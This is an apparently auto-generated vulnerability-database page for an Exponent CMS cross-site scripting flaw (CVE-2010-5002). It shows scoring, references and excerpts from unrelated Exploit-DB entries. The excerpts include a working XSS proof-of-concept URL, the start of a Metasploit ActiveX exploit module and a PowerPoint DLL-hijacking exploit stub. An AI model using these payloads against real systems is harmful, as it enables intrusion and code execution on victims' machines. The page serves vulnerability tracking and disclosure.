CVE-2010-5002
published 2011-11-01CVE-2010-5002: Cross-site scripting (XSS) vulnerability in modules/slideshowmodule/slideshow.js.php in Exponent CMS 0.97.0 allows remote attackers to inject arbitrary web…
PriorityP420medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.73%
74.7th percentile
Cross-site scripting (XSS) vulnerability in modules/slideshowmodule/slideshow.js.php in Exponent CMS 0.97.0 allows remote attackers to inject arbitrary web script or HTML via the u parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| exponentcms | exponent_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
exploitdb·2015-09-16
CVE-2015-2510 Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=469
The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.
File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GD
Exploit-DB
Chilkat Crypt - ActiveX WriteFile Unsafe Method (Metasploit)
exploitdb·2010-09-20
CVE-2008-5002 Chilkat Crypt - ActiveX WriteFile Unsafe Method (Metasploit)
Chilkat Crypt - ActiveX WriteFile Unsafe Method (Metasploit)
---
##
# $Id: chilkat_crypt_writefile.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Chilkat Crypt ActiveX WriteFile Unsafe Method',
'Description' => %q{
This module allows attackers to execute code via the 'WriteFile' unsafe method of
Chilkat Software Inc's Crypt ActiveX control.
This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to
execute our payload immediately. However, this method requires that the victim user
Exploit-DB
Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3142 Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking
Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking
---
/*
Exploit Title: Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)
Date: August 25, 2010
Author: storm ([email protected])
Version: 2007 (12.0.6535.5002) SP2
Tested on: Windows Vista SP2
http://www.gonullyourself.org/
gcc -shared -o rpawinet.dll PowerPoint-DLL.c
.odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx files are affected.
*/
#include
#define DllExport __declspec (dllexport)
DllExport void HttpFilterBeginningTransaction() { hax(); }
DllExport void HttpFilterClose() { hax(); }
DllExport void HttpFilterOnBlockingOps() { hax(); }
DllExport void HttpFilterOnResponse() { hax(); }
DllExport void HttpFilterOnTransactionComplete() {
Exploit-DB
Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting
exploitdb·2010-07-07
CVE-2010-5002 Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting
Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/41447/info
Exponent CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Exponent 0.97.0 is vulnerable; other versions may also be affected.
http://www.example.com/modules/slideshowmodule/slideshow.js.php?u=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
No writeups or analysis indexed.
http://packetstormsecurity.org/1007-exploits/exponentcms-xss.txthttp://secunia.com/advisories/36703http://securityreason.com/securityalert/8485http://www.securityfocus.com/archive/1/512224/100/0/threadedhttp://www.securityfocus.com/bid/41447https://exchange.xforce.ibmcloud.com/vulnerabilities/60168http://packetstormsecurity.org/1007-exploits/exponentcms-xss.txthttp://secunia.com/advisories/36703http://securityreason.com/securityalert/8485http://www.securityfocus.com/archive/1/512224/100/0/threadedhttp://www.securityfocus.com/bid/41447https://exchange.xforce.ibmcloud.com/vulnerabilities/60168
2011-11-01
Published